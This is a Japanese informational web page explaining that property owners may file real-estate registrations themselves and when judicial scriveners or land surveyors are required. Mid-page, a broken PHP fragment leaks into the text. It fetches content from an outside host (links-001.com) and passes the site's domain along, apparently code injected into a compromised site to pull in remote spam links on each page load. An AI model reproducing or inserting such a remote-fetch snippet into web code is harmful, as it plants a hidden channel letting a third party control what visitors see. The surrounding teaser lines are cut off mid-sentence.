banner

不動産登記について

不動産登記は、業でなければ、誰でも手続きすることが可能です。

banner 不動産登記というと、一般的には住宅を購入する際や、住宅ローンを完済したときに手続きするというイメージがあります。
不動産登記は、国民の大切な財産である土地や建物の所在、面積のほか、所有者の住所、氏名などを公の登記簿に記載し、これを一般公開することにより、権利関係などの状況が誰にでもわかるようにし、取引の安全と円滑をはかる役割をはたしています。
不動産登記法により、登記は、自分で行うことが原則になっています。
条文は登記の種類ごとにあり、全ての登記は自分で行うのが原則です。
ただし、司法書士は、他人の依頼を受け、報酬を得、登記の手続きを行うことができます。
また、土地家屋調査士は、他人の依頼を受け、報酬を得、不動産表示に関する登記の手続きを行うことができます。
業であれば、司法書士や土地家屋調査士でなければなりませんが、業でなければ、誰でも、他人からの依頼を受けて登記の手続きができます。
家族や友人が、報酬を得ずに、所有者の代わりに登記の手続きを行うことが可能です。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

不動産登記情報一覧

banner
不動産を所有している方はよくご存知ですが、家や土地について物理的な状態を公に示したものを不動産登記と

不動産の価値を明確に記した不動産登記とは

banner
簡単な不動産登記だったら、法務局にいって、アドバイスをもらいながら自分で比較的簡単に短時間で出来ちゃ

不動産登記って自分でできます。

banner
不動産登記とは不動産(土地や建物)の所在、地番や家屋番号、面積や構造などを法務局の登記簿に記載するこ

不動産登記と登記簿謄本の閲覧

Copyright(c) 不動産登記 All Rights Reserved.